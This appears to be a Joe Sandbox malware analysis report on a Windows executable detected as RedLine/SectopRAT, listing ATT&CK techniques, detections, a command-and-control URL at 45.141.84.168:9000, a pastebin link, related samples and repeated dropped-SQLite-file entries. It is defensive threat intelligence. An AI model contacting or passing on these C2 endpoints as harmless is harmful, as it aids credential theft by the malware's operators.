                  Source: Yara matchFile source: Process Memory Space: Kyuo21uNlG.exe PID: 7340, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: Kyuo21uNlG.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.Kyuo21uNlG.exe.420000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1673629570.0000000000422000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Kyuo21uNlG.exe PID: 7340, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Masquerading
                  1
                  OS Credential Dumping
                  231
                  Security Software Discovery
                  Remote Services11
                  Input Capture
                  2
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                  Disable or Modify Tools
                  11
                  Input Capture
                  1
                  Process Discovery
                  Remote Desktop Protocol1
                  Archive Collected Data
                  11
                  Non-Standard Port
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)241
                  Virtualization/Sandbox Evasion
                  Security Account Manager241
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin Shares1
                  Data from Local System
                  1
                  Ingress Tool Transfer
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                  Obfuscated Files or Information
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object ModelInput Capture1
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Software Packing
                  LSA Secrets113
                  System Information Discovery
                  SSHKeylogging1
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Kyuo21uNlG.exe68%ReversingLabsByteCode-MSIL.Ransomware.RedLine
                  Kyuo21uNlG.exe100%AviraTR/Agent.wzofw
                  Kyuo21uNlG.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://45.141.84.168:90000%Avira URL Cloudsafe
                  http://45.141.84.168:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE080%Avira URL Cloudsafe
                  No contacted domains info
                  NameMaliciousAntivirus DetectionReputation
                  http://45.141.84.168:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08true
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://ac.ecosia.org/autocomplete?q=Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002B38000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://duckduckgo.com/chrome_newtabKyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A6A000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://duckduckgo.com/ac/?q=Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002B38000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoKyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002B38000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchKyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002B38000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002B38000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://45.141.84.168:9000Kyuo21uNlG.exe, 00000000.00000002.4125805350.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002B38000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/chrome_newtabSKyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002B38000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://www.ecosia.org/newtab/Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002B38000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameKyuo21uNlG.exe, 00000000.00000002.4125805350.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002B38000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://pastebin.com/raw/cLika3dtKyuo21uNlG.exe, 00000000.00000002.4125805350.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          45.141.84.168
                                          unknownRussian Federation
                                          206728MEDIALAND-ASRUtrue
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1564529
                                          Start date and time:2024-11-28 13:38:10 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 7m 29s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:5
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:Kyuo21uNlG.exe
                                          renamed because original name is a hash value
                                          Original Sample Name:a499adf007df84fc58178a1fd861138c078731760bea948501259c8e83e19783.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@1/13@0/1
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 99%
                                          • Number of executed functions: 139
                                          • Number of non-executed functions: 35
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Override analysis time to 240s for sample files taking high CPU consumption
                                          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing network information.
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • VT rate limit hit for: Kyuo21uNlG.exe
                                          TimeTypeDescription
                                          07:39:01API Interceptor3825528x Sleep call for process: Kyuo21uNlG.exe modified
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          45.141.84.168goHB2EXlPf.exeGet hashmaliciousRedLine, SectopRATBrowse
                                          • 45.141.84.168:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F
                                          goHB2EXlPf.exeGet hashmaliciousRedLine, SectopRATBrowse
                                          • 45.141.84.168:9000/wbinjget?q=A612222D470BA4D43AA5158F6CE0BD99
                                          9VbeqQbgU4.exeGet hashmaliciousRedLine, SectopRATBrowse
                                          • 45.141.84.168:9000/wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE
                                          9VbeqQbgU4.exeGet hashmaliciousRedLine, SectopRATBrowse
                                          • 45.141.84.168:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          MEDIALAND-ASRUgoHB2EXlPf.exeGet hashmaliciousRedLine, SectopRATBrowse
                                          • 45.141.84.168
                                          goHB2EXlPf.exeGet hashmaliciousRedLine, SectopRATBrowse
                                          • 45.141.84.168
                                          9VbeqQbgU4.exeGet hashmaliciousRedLine, SectopRATBrowse
                                          • 45.141.84.168
                                          9VbeqQbgU4.exeGet hashmaliciousRedLine, SectopRATBrowse
                                          • 45.141.84.168
                                          SecuriteInfo.com.Win32.Malware-gen.6717.12233.exeGet hashmaliciousRedLine, SectopRATBrowse
                                          • 45.141.86.82
                                          ExeFile (236).exeGet hashmaliciousOskiBrowse
                                          • 45.141.84.184
                                          bLNr5K5U7B.elfGet hashmaliciousMiraiBrowse
                                          • 45.141.84.241
                                          aqua.arm7Get hashmaliciousMiraiBrowse
                                          • 45.141.84.246
                                          5xPf2c2uL7.exeGet hashmaliciousRedLine SmokeLoaderBrowse
                                          • 45.141.84.21
                                          VsaIxu42Ks.exeGet hashmaliciousRaccoon RedLine SmokeLoaderBrowse
                                          • 45.141.84.21
                                          No context
                                          No context
                                          Process:C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
